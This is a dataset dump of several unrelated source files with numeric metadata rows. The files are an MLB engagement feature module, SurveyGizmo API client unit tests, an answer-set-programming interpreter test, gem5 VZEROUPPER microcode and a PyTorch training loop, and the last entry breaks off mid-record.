| 41.35387 | 91 | 0.570902 | 5,905 | 52,354 | 4.782896 | 0.083489 | 0.029636 | 0.049393 | 0.036717 | 0.820522 | 0.798888 | 0.786708 | 0.765676 | 0.748256 | 0.732713 | 0 | 0.030916 | 0.345112 | 52,354 | 1,265 | 92 | 41.386561 | 0.792831 | 0.118195 | 0 | 0.732265 | 0 | 0 | 0.147273 | 0.022984 | 0 | 0 | 0 | 0 | 0.084668 | 1 | 0.048055 | false | 0 | 0.011442 | 0 | 0.064073 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
404203dff960899046bf0798466dac448b66d551 | 5,327 | py | Python | src/features/f800_meta.py | copyrosicky/MlbEngagementCompetition | eaeb3759946d5c5cde6c265698179db1a68dc935 | [
"MIT"
] | 7 | 2021-09-10T17:33:59.000Z | 2022-01-21T04:07:51.000Z | src/features/f800_meta.py | copyrosicky/MlbEngagementCompetition | eaeb3759946d5c5cde6c265698179db1a68dc935 | [
"MIT"
] | null | null | null | src/features/f800_meta.py | copyrosicky/MlbEngagementCompetition | eaeb3759946d5c5cde6c265698179db1a68dc935 | [
"MIT"
] | 4 | 2021-08-18T10:10:41.000Z | 2022-01-28T04:47:08.000Z | from typing import Dict
import pandas as pd
from src.streamdf import TimeSeriesStream
from src.features import *
from src.features.helper import diff_days
@feature([
'events_oof_target1_min',
'events_oof_target1_max',
'events_oof_target1_mean',
'events_oof_target2_min',
'events_oof_target2_max',
'events_oof_target2_mean',
])
def f800_meta(ctx: Context) -> Dict:
if len(ctx.player.events_meta) == 0:
return empty_feature(ctx.current_feature_name)
meta = ctx.player.events_meta
return {
k: meta.last_value(k) for k in [
'events_oof_target1_min',
'events_oof_target1_max',
'events_oof_target1_mean',
'events_oof_target2_min',
'events_oof_target2_max',
'events_oof_target2_mean',
]
}
@feature([
'events_oof_target1_g_max',
'events_oof_target1_g_mean',
'events_oof_target2_g_max',
'events_oof_target2_g_mean'
])
def f801_meta_global(ctx: Context) -> Dict:
if len(ctx.daily_stats) == 0:
return empty_feature(ctx.current_feature_name)
meta = ctx.daily_stats
return {
k: meta.last_value(k) for k in [
'events_oof_target1_g_max',
'events_oof_target1_g_mean',
'events_oof_target2_g_max',
'events_oof_target2_g_mean'
]
}
@feature([
'events_oof_target1_t_max',
'events_oof_target1_t_mean',
'events_oof_target2_t_max',
'events_oof_target2_t_mean',
'events_oof_target3_t_max',
'events_oof_target3_t_mean',
'events_oof_target4_t_max',
'events_oof_target4_t_mean',
])
def f802_meta_team(ctx: Context) -> Dict:
if ctx.team is None:
return empty_feature(ctx.current_feature_name)
meta = ctx.team.events_meta
return {
k: meta.last_value(k) for k in [
'events_oof_target1_t_max',
'events_oof_target1_t_mean',
'events_oof_target2_t_max',
'events_oof_target2_t_mean',
'events_oof_target3_t_max',
'events_oof_target3_t_mean',
'events_oof_target4_t_max',
'events_oof_target4_t_mean',
]
}
@feature([
'events_oof_target1_min',
'events_oof_target1_max',
'events_oof_target1_mean',
'events_oof_target2_min',
'events_oof_target2_max',
'events_oof_target2_mean',
'events_oof_target3_min',
'events_oof_target3_max',
'events_oof_target3_mean',
'events_oof_target4_min',
'events_oof_target4_max',
'events_oof_target4_mean',
])
def f803_meta_asof_30d(ctx: Context) -> Dict:
if len(ctx.player.events_meta) == 0:
return empty_feature(ctx.current_feature_name)
meta = ctx.player.events_meta
if diff_days(ctx.daily_data_date, meta) > 30:
return empty_feature(ctx.current_feature_name)
return {
k: meta.last_value(k) for k in [
'events_oof_target1_min',
'events_oof_target1_max',
'events_oof_target1_mean',
'events_oof_target2_min',
'events_oof_target2_max',
'events_oof_target2_mean',
'events_oof_target3_min',
'events_oof_target3_max',
'events_oof_target3_mean',
'events_oof_target4_min',
'events_oof_target4_max',
'events_oof_target4_mean',
]
}
@feature([
'events_oof_target1_t_max',
'events_oof_target1_t_mean',
'events_oof_target2_t_max',
'events_oof_target2_t_mean',
'events_oof_target3_t_max',
'events_oof_target3_t_mean',
'events_oof_target4_t_max',
'events_oof_target4_t_mean',
])
def f804_meta_team_exact(ctx: Context) -> Dict:
if ctx.team is None:
return empty_feature(ctx.current_feature_name)
meta = ctx.team.events_meta
# exact match
if len(meta) == 0 or meta.index[-1] != ctx.daily_data_date:
return empty_feature(ctx.current_feature_name)
return {
k: meta.last_value(k) for k in [
'events_oof_target1_t_max',
'events_oof_target1_t_mean',
'events_oof_target2_t_max',
'events_oof_target2_t_mean',
'events_oof_target3_t_max',
'events_oof_target3_t_mean',
'events_oof_target4_t_max',
'events_oof_target4_t_mean',
]
}
@feature([
'events_oof_target1_g_max',
'events_oof_target1_g_mean',
'events_oof_target2_g_max',
'events_oof_target2_g_mean',
'events_oof_target3_g_max',
'events_oof_target3_g_mean',
'events_oof_target4_g_max',
'events_oof_target4_g_mean',
])
def f805_meta_global_exact(ctx: Context) -> Dict:
if len(ctx.daily_stats) == 0:
return empty_feature(ctx.current_feature_name)
meta = ctx.daily_stats
# exact match
if len(meta) == 0 or meta.index[-1] != ctx.daily_data_date:
return empty_feature(ctx.current_feature_name)
return {
k: meta.last_value(k) for k in [
'events_oof_target1_g_max',
'events_oof_target1_g_mean',
'events_oof_target2_g_max',
'events_oof_target2_g_mean',
'events_oof_target3_g_max',
'events_oof_target3_g_mean',
'events_oof_target4_g_max',
'events_oof_target4_g_mean',
]
}
| 27.458763 | 63 | 0.653276 | 716 | 5,327 | 4.305866 | 0.090782 | 0.26857 | 0.155693 | 0.067467 | 0.919559 | 0.916315 | 0.916315 | 0.916315 | 0.916315 | 0.916315 | 0 | 0.030669 | 0.253238 | 5,327 | 193 | 64 | 27.601036 | 0.744344 | 0.004318 | 0 | 0.852761 | 0 | 0 | 0.410489 | 0.410489 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03681 | false | 0 | 0.030675 | 0 | 0.159509 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
406c58a5fcca2bf9437e203c2081652887d027df | 13,205 | py | Python | tests/test_api.py | tozhovez/SurveyGizmo | ea36dde1167e7424a67d2f61ade0a0505e449a4b | [
"BSD-3-Clause"
] | null | null | null | tests/test_api.py | tozhovez/SurveyGizmo | ea36dde1167e7424a67d2f61ade0a0505e449a4b | [
"BSD-3-Clause"
] | null | null | null | tests/test_api.py | tozhovez/SurveyGizmo | ea36dde1167e7424a67d2f61ade0a0505e449a4b | [
"BSD-3-Clause"
] | null | null | null |
from unittest import TestCase
from surveygizmo import SurveyGizmo
client = SurveyGizmo(api_token='token', api_token_secret='secret', prepare_url=True)
client.api.base_url = ''
class AccountTests(TestCase):
resource = client.api.account
def test_list(self):
with self.assertRaises(NotImplementedError):
self.resource.list()
def test_get(self):
path, params = self.resource.get()
self.assertEqual(path, 'head/account/')
def test_create(self):
with self.assertRaises(NotImplementedError):
self.resource.create()
def test_update(self):
with self.assertRaises(NotImplementedError):
self.resource.update()
def test_copy(self):
with self.assertRaises(NotImplementedError):
self.resource.copy()
def test_delete(self):
with self.assertRaises(NotImplementedError):
self.resource.delete()
class AccountTeamsTests(TestCase):
resource = client.api.accountteams
def test_list(self):
path, params = self.resource.list()
self.assertEqual(path, 'head/accountteams/')
def test_get(self):
path, params = self.resource.get(1)
self.assertEqual(path, 'head/accountteams/1')
def test_create(self):
path, params = self.resource.create('team')
self.assertEqual(path, 'head/accountteams/')
self.assertEqual(params['teamname'], 'team')
def test_update(self):
path, params = self.resource.update(1)
self.assertEqual(path, 'head/accountteams/1')
def test_copy(self):
with self.assertRaises(NotImplementedError):
self.resource.copy()
def test_delete(self):
path, params = self.resource.delete(1)
self.assertEqual(path, 'head/accountteams/1')
class AccountUserTests(TestCase):
resource = client.api.accountuser
def test_list(self):
path, params = self.resource.list()
self.assertEqual(path, 'head/accountuser/')
def test_get(self):
path, params = self.resource.get(1)
self.assertEqual(path, 'head/accountuser/1')
def test_create(self):
path, params = self.resource.create('user@example.com')
self.assertEqual(path, 'head/accountuser/')
self.assertEqual(params['email'], 'user@example.com')
def test_update(self):
path, params = self.resource.update(1)
self.assertEqual(path, 'head/accountuser/1')
def test_copy(self):
with self.assertRaises(NotImplementedError):
self.resource.copy()
def test_delete(self):
path, params = self.resource.delete(1)
self.assertEqual(path, 'head/accountuser/1')
class ContactTests(TestCase):
resource = client.api.contact
def test_list(self):
path, params = self.resource.list(1, 1)
self.assertEqual(path, 'head/survey/1/surveycampaign/1/contact/')
def test_get(self):
path, params = self.resource.get(1, 1, 1)
self.assertEqual(path, 'head/survey/1/surveycampaign/1/contact/1')
def test_create(self):
path, params = self.resource.create(1, 1, 'user@example.com')
self.assertEqual(path, 'head/survey/1/surveycampaign/1/contact/')
self.assertEqual(params['semailaddress'], 'user@example.com')
def test_update(self):
path, params = self.resource.update(1, 1, 1)
self.assertEqual(path, 'head/survey/1/surveycampaign/1/contact/1')
def test_copy(self):
with self.assertRaises(NotImplementedError):
self.resource.copy()
def test_delete(self):
path, params = self.resource.delete(1, 1, 1)
self.assertEqual(path, 'head/survey/1/surveycampaign/1/contact/1')
class ContactListTests(TestCase):
resource = client.api.contactlist
def test_list(self):
path, params = self.resource.list()
self.assertEqual(path, 'head/contactlist/')
def test_get(self):
path, params = self.resource.get(1)
self.assertEqual(path, 'head/contactlist/1')
def test_create(self):
path, params = self.resource.create('Contact List')
self.assertEqual(path, 'head/contactlist/')
self.assertEqual(params['listname'], 'Contact List')
def test_update(self):
path, params = self.resource.update(1, 'user@example.com')
self.assertEqual(path, 'head/contactlist/1')
self.assertEqual(params['semailaddress'], 'user@example.com')
def test_copy(self):
with self.assertRaises(NotImplementedError):
self.resource.copy()
def test_delete(self):
with self.assertRaises(NotImplementedError):
self.resource.delete()
class EmailMessageTests(TestCase):
resource = client.api.emailmessage
def test_list(self):
path, params = self.resource.list(1, 1)
self.assertEqual(path, 'head/survey/1/surveycampaign/1/emailmessage/')
def test_get(self):
path, params = self.resource.get(1, 1, 1)
self.assertEqual(path, 'head/survey/1/surveycampaign/1/emailmessage/1')
def test_create(self):
path, params = self.resource.create(1, 1)
self.assertEqual(path, 'head/survey/1/surveycampaign/1/emailmessage/')
def test_update(self):
path, params = self.resource.update(1, 1, 1)
self.assertEqual(path, 'head/survey/1/surveycampaign/1/emailmessage/1')
def test_copy(self):
with self.assertRaises(NotImplementedError):
self.resource.copy()
def test_delete(self):
path, params = self.resource.delete(1, 1, 1)
self.assertEqual(path, 'head/survey/1/surveycampaign/1/emailmessage/1')
class SurveyTests(TestCase):
resource = client.api.survey
def test_list(self):
path, params = self.resource.list()
self.assertEqual(path, 'head/survey/')
def test_get(self):
path, params = self.resource.get(1)
self.assertEqual(path, 'head/survey/1')
def test_create(self):
path, params = self.resource.create('My Survey', 'poll')
self.assertEqual(path, 'head/survey/')
self.assertEqual(params['title'], 'My Survey')
self.assertEqual(params['type'], 'poll')
def test_update(self):
path, params = self.resource.update(1)
self.assertEqual(path, 'head/survey/1')
def test_copy(self):
path, params = self.resource.copy(1)
self.assertEqual(path, 'head/survey/1')
def test_delete(self):
path, params = self.resource.delete(1)
self.assertEqual(path, 'head/survey/1')
class SurveyCampaignTests(TestCase):
resource = client.api.surveycampaign
def test_list(self):
path, params = self.resource.list(1)
self.assertEqual(path, 'head/survey/1/surveycampaign/')
def test_get(self):
path, params = self.resource.get(1, 1)
self.assertEqual(path, 'head/survey/1/surveycampaign/1')
def test_create(self):
path, params = self.resource.create(1, 'My Campaign', 'email')
self.assertEqual(path, 'head/survey/1/surveycampaign/')
self.assertEqual(params['name'], 'My Campaign')
self.assertEqual(params['type'], 'email')
def test_update(self):
path, params = self.resource.update(1, 1)
self.assertEqual(path, 'head/survey/1/surveycampaign/1')
def test_copy(self):
path, params = self.resource.copy(1, 1)
self.assertEqual(path, 'head/survey/1/surveycampaign/1')
def test_delete(self):
path, params = self.resource.delete(1, 1)
self.assertEqual(path, 'head/survey/1/surveycampaign/1')
class SurveyOptionTests(TestCase):
resource = client.api.surveyoption
def test_list(self):
path, params = self.resource.list(1, 1)
self.assertEqual(path, 'head/survey/1/surveyquestion/1/surveyoption/')
def test_get(self):
path, params = self.resource.get(1, 1, 1)
self.assertEqual(path, 'head/survey/1/surveyquestion/1/surveyoption/1')
def test_create(self):
path, params = self.resource.create(1, 1, 'Option', 'Value')
self.assertEqual(path, 'head/survey/1/surveyquestion/1/surveyoption/')
self.assertEqual(params['title'], 'Option')
self.assertEqual(params['value'], 'Value')
def test_update(self):
path, params = self.resource.update(1, 1, 1)
self.assertEqual(path, 'head/survey/1/surveyquestion/1/surveyoption/1')
def test_copy(self):
with self.assertRaises(NotImplementedError):
self.resource.copy()
def test_delete(self):
path, params = self.resource.delete(1, 1, 1)
self.assertEqual(path, 'head/survey/1/surveyquestion/1/surveyoption/1')
class SurveyPageTests(TestCase):
resource = client.api.surveypage
def test_list(self):
path, params = self.resource.list(1)
self.assertEqual(path, 'head/survey/1/surveypage/')
def test_get(self):
path, params = self.resource.get(1, 1)
self.assertEqual(path, 'head/survey/1/surveypage/1')
def test_create(self):
path, params = self.resource.create(1, 'Page 1')
self.assertEqual(path, 'head/survey/1/surveypage/')
self.assertEqual(params['title'], 'Page 1')
def test_update(self):
path, params = self.resource.update(1, 1)
self.assertEqual(path, 'head/survey/1/surveypage/1')
def test_copy(self):
with self.assertRaises(NotImplementedError):
self.resource.copy()
def test_delete(self):
path, params = self.resource.delete(1, 1)
self.assertEqual(path, 'head/survey/1/surveypage/1')
class SurveyQuestionTests(TestCase):
resource = client.api.surveyquestion
def test_list(self):
path, params = self.resource.list(1)
self.assertEqual(path, 'head/survey/1/surveyquestion/')
def test_get(self):
path, params = self.resource.get(1, 1)
self.assertEqual(path, 'head/survey/1/surveyquestion/1')
def test_create(self):
path, params = self.resource.create(1, 1)
self.assertEqual(path, 'head/survey/1/surveypage/1/surveyquestion/')
def test_update(self):
path, params = self.resource.update(1, 1)
self.assertEqual(path, 'head/survey/1/surveyquestion/1')
def test_copy(self):
with self.assertRaises(NotImplementedError):
self.resource.copy()
def test_delete(self):
path, params = self.resource.delete(1, 1)
self.assertEqual(path, 'head/survey/1/surveyquestion/1')
class SurveyReportTests(TestCase):
resource = client.api.surveyreport
def test_list(self):
path, params = self.resource.list(1)
self.assertEqual(path, 'head/survey/1/surveyreport/')
def test_get(self):
path, params = self.resource.get(1, 1)
self.assertEqual(path, 'head/survey/1/surveyreport/1')
def test_create(self):
with self.assertRaises(NotImplementedError):
self.resource.create()
def test_update(self):
path, params = self.resource.update(1, 1)
self.assertEqual(path, 'head/survey/1/surveyreport/1')
self.assertEqual(params['copy'], 'false')
def test_copy(self):
path, params = self.resource.copy(1, 1)
self.assertEqual(path, 'head/survey/1/surveyreport/1')
self.assertEqual(params['copy'], 'true')
def test_delete(self):
path, params = self.resource.delete(1, 1)
self.assertEqual(path, 'head/survey/1/surveyreport/1')
class SurveyResponseTests(TestCase):
resource = client.api.surveyresponse
def test_list(self):
path, params = self.resource.list(1)
self.assertEqual(path, 'head/survey/1/surveyresponse/')
def test_get(self):
path, params = self.resource.get(1, 1)
self.assertEqual(path, 'head/survey/1/surveyresponse/1')
def test_create(self):
path, params = self.resource.create(1)
self.assertEqual(path, 'head/survey/1/surveyresponse/')
def test_update(self):
path, params = self.resource.update(1, 1)
self.assertEqual(path, 'head/survey/1/surveyresponse/1')
def test_copy(self):
with self.assertRaises(NotImplementedError):
self.resource.copy()
def test_delete(self):
path, params = self.resource.delete(1, 1)
self.assertEqual(path, 'head/survey/1/surveyresponse/1')
class SurveyStatisticTests(TestCase):
resource = client.api.surveystatistic
def test_list(self):
path, params = self.resource.list(1)
self.assertEqual(path, 'head/survey/1/surveystatistic/')
def test_get(self):
with self.assertRaises(NotImplementedError):
self.resource.get()
def test_create(self):
with self.assertRaises(NotImplementedError):
self.resource.create()
def test_update(self):
with self.assertRaises(NotImplementedError):
self.resource.update()
def test_copy(self):
with self.assertRaises(NotImplementedError):
self.resource.copy()
def test_delete(self):
with self.assertRaises(NotImplementedError):
self.resource.delete()
| 31.973366 | 84 | 0.653768 | 1,587 | 13,205 | 5.383743 | 0.049149 | 0.06882 | 0.10323 | 0.132725 | 0.835908 | 0.823736 | 0.815309 | 0.789209 | 0.772589 | 0.735487 | 0 | 0.018693 | 0.214086 | 13,205 | 412 | 85 | 32.050971 | 0.804587 | 0 | 0 | 0.788591 | 0 | 0 | 0.158664 | 0.108149 | 0 | 0 | 0 | 0 | 0.328859 | 1 | 0.281879 | false | 0 | 0.006711 | 0 | 0.38255 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
407125ca0951f747db634a39b5081a6dd185a409 | 1,805 | py | Python | tests/parser/answer_sets_interpreter.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/answer_sets_interpreter.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/answer_sets_interpreter.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | input = """
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% dlv-Interpreter for preferred answer sets of propositional programs.
%
% Store rules
%
% r: A <- B1,...,Bm, not C1,..., not Cn
%
% by facts:
%
% rule(r). head(A,r). bpl(B1,r). ... bpl(Bm,r). nbl(C1,r). ... nbl(Cn,r).
%
% classical negation must be emulated, state facts opp(L,L') for
% opposite classical literals
%
% Specify preference r < r' through fact pr(r,r').
%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Apply rules of the program:
in_AS(X) :- head(X,Y), not pos_body_false(Y), not neg_body_false(Y).
% pbl - positive body literal; nbl - negative body literal
pos_body_false(Y) :- pbl(X,Y), not in_AS(X).
neg_body_false(Y) :- nbl(X,Y), in_AS(X).
% Eliminate opposite literals (explicitly specified).
:- opp(X,Y), in_AS(X), in_AS(Y).
"""
output = """
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% dlv-Interpreter for preferred answer sets of propositional programs.
%
% Store rules
%
% r: A <- B1,...,Bm, not C1,..., not Cn
%
% by facts:
%
% rule(r). head(A,r). bpl(B1,r). ... bpl(Bm,r). nbl(C1,r). ... nbl(Cn,r).
%
% classical negation must be emulated, state facts opp(L,L') for
% opposite classical literals
%
% Specify preference r < r' through fact pr(r,r').
%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Apply rules of the program:
in_AS(X) :- head(X,Y), not pos_body_false(Y), not neg_body_false(Y).
% pbl - positive body literal; nbl - negative body literal
pos_body_false(Y) :- pbl(X,Y), not in_AS(X).
neg_body_false(Y) :- nbl(X,Y), in_AS(X).
% Eliminate opposite literals (explicitly specified).
:- opp(X,Y), in_AS(X), in_AS(Y).
"""
| 25.422535 | 74 | 0.52133 | 252 | 1,805 | 3.630952 | 0.234127 | 0.043716 | 0.043716 | 0.056831 | 0.987978 | 0.987978 | 0.987978 | 0.987978 | 0.987978 | 0.987978 | 0 | 0.005316 | 0.166205 | 1,805 | 70 | 75 | 25.785714 | 0.602658 | 0 | 0 | 0.666667 | 0 | 0.074074 | 0.982825 | 0.158449 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
40c672435d29a97d7880b2793382d6bc7faec09a | 2,183 | py | Python | src/arch/x86/isa/insts/simd512/floating_point/data_transfer/vzeroupper.py | jyhuang91/gem5-avx | f988da46080f8db49beb39e20af437219f3aa4cb | [
"BSD-3-Clause"
] | 2 | 2021-01-15T17:32:18.000Z | 2021-12-21T02:53:58.000Z | src/arch/x86/isa/insts/simd512/floating_point/data_transfer/vzeroupper.py | jyhuang91/gem5-avx | f988da46080f8db49beb39e20af437219f3aa4cb | [
"BSD-3-Clause"
] | 3 | 2021-03-26T20:33:59.000Z | 2022-01-24T22:54:03.000Z | src/arch/x86/isa/insts/simd512/floating_point/data_transfer/vzeroupper.py | jyhuang91/gem5-avx | f988da46080f8db49beb39e20af437219f3aa4cb | [
"BSD-3-Clause"
] | 3 | 2021-03-27T16:36:19.000Z | 2022-03-28T18:32:57.000Z | microcode = '''
def macroop VZEROUPPER {
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(0, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(1, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(2, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(3, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(4, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(5, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(6, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(7, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(8, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(9, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(10, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(11, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(12, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(13, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(14, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(15, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(16, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(17, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(18, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(19, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(20, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(21, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(22, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(23, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(24, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(25, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(26, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(27, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(28, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(29, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(30, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(31, 2))", destVL=16
};
''' | 57.447368 | 66 | 0.726981 | 324 | 2,183 | 4.700617 | 0.132716 | 0.210112 | 0.462246 | 0.630335 | 0.939593 | 0.939593 | 0.915955 | 0.915955 | 0.915955 | 0 | 0 | 0.078247 | 0.121851 | 2,183 | 38 | 67 | 57.447368 | 0.716223 | 0 | 0 | 0 | 0 | 0 | 0.9913 | 0.56685 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
40ea9085b02af507219d551597a01f94325787d7 | 3,968 | py | Python | Trainer.py | kellypetrino/pytorch_stacked_hourglass | 424a0a5d494cd8f3bb6fe257459c334ae190a9fd | [
"BSD-3-Clause"
] | null | null | null | Trainer.py | kellypetrino/pytorch_stacked_hourglass | 424a0a5d494cd8f3bb6fe257459c334ae190a9fd | [
"BSD-3-Clause"
] | null | null | null | Trainer.py | kellypetrino/pytorch_stacked_hourglass | 424a0a5d494cd8f3bb6fe257459c334ae190a9fd | [
"BSD-3-Clause"
] | null | null | null | import torch
import numpy as np
class Trainer():
def __init__(self,net=None,optim=None,loss_function=None, train_loader=None, device=None, filename=None):
self.net = net
self.optim = optim
self.loss_function = loss_function
self.train_loader = train_loader
self.device=device
self.filename = filename
def train1(self,epochs):
losses = []
acc = []
for epoch in range(epochs):
epoch_loss = 0.0
epoch_steps = 0
tot_cor = 0
tot = 0
for data in self.train_loader:
# Moves batch to (ideally) GPU
X = data[0].to(self.device)
y = data[1].to(self.device)
# Zero the gradient in the optimizer, i.e. self.optim
self.optim.zero_grad()
# Get output of network!
output = self.net(X)
# Get loss (prbly using cross entropy loss function)
loss = self.loss_function(output, y)
# Backpropagate on the loss to compute gradients of parameters
loss.backward()
# Step optimizer aka update the gradients
self.optim.step()
_, pred = torch.max(output, 1)
b = len(y[y==pred])
c = len(y)
tot_cor += b
tot += c
a = loss.detach()
epoch_loss += a
epoch_steps += 1
print(f'loss, acc: {a}, {b/c*100}')
losses.append(a)
acc.append(b/c*100)
# average loss of epoch
print("epoch [%d]: finished")
tot_acc = tot_cor/tot*100
#tot_loss = epoch_loss / epoch_steps
torch.save(self.net.state_dict(), f'our_models/{self.filename}_eps{epoch}_{tot_acc:.3f}.pt') # Save network labeled with val accuracy
np.save(f'train_acc/{self.filename}_eps{epoch}_{tot_acc:.3f}.npy', np.array(acc)) # Save training accuracy
np.save(f'train_loss/{self.filename}_eps{epoch}_{tot_acc:.3f}.npy', np.array(losses)) # Save training loss
return losses, acc
def train2(self,epochs):
losses = []
acc = []
for epoch in range(epochs):
epoch_loss = 0.0
epoch_steps = 0
tot_cor = 0
tot = 0
for data in self.train_loader:
# Moves batch to (ideally) GPU
X = data[0].to(self.device)
Y = data[1].to(self.device)
z = data[2].to(self.device)
# Zero the gradient in the optimizer, i.e. self.optim
self.optim.zero_grad()
# Get output of network!
output = self.net(X, Y)
# Get loss (prbly using cross entropy loss function)
loss = self.loss_function(output, z)
# Backpropagate on the loss to compute gradients of parameters
loss.backward()
# Step optimizer aka update the gradients
self.optim.step()
_, pred = torch.max(output, 1)
b = len(z[z==pred])
c = len(z)
tot_cor += b
tot += c
a = loss.detach()
epoch_loss += a
epoch_steps += 1
print(f'loss, acc: {a}, {b/c*100}')
losses.append(a)
acc.append(b/c*100)
# average loss of epoch
print("epoch [%d]: finished")
tot_acc = tot_cor/tot*100
#tot_loss = epoch_loss / epoch_steps
torch.save(self.net.state_dict(), f'our_models/{self.filename}_eps{epoch}_{tot_acc:.3f}.pt') # Save network labeled with val accuracy
np.save(f'train_acc/{self.filename}_eps{epoch}_{tot_acc:.3f}.npy', np.array(acc)) # Save training accuracy
np.save(f'train_loss/{self.filename}_eps{epoch}_{tot_acc:.3f}.npy', np.array(losses)) # Save training loss
return losses, acc | 35.428571 | 143 | 0.534022 | 512 | 3,968 | 4.009766 | 0.189453 | 0.02338 | 0.043838 | 0.058451 | 0.863127 | 0.863127 | 0.863127 | 0.863127 | 0.863127 | 0.863127 | 0 | 0.017626 | 0.356603 | 3,968 | 112 | 144 | 35.428571 | 0.786526 | 0.198337 | 0 | 0.701299 | 0 | 0 | 0.136483 | 0.106955 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038961 | false | 0 | 0.025974 | 0 | 0.103896 | 0.051948 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
40f457dc30e37776132fa2739f0e5efa5f0e2a70 | 110 | py | Python | tests/test_factory.py | maxrousseau/flask-pfla | 44b1e08f8cf762f18eb221b37f2a68e6af577172 | [
"MIT"
] | 2 | 2018-10-15T03:42:59.000Z | 2018-12-08T00:01:06.000Z | tests/test_factory.py | maxrousseau/densys.org | 44b1e08f8cf762f18eb221b37f2a68e6af577172 | [
"MIT"
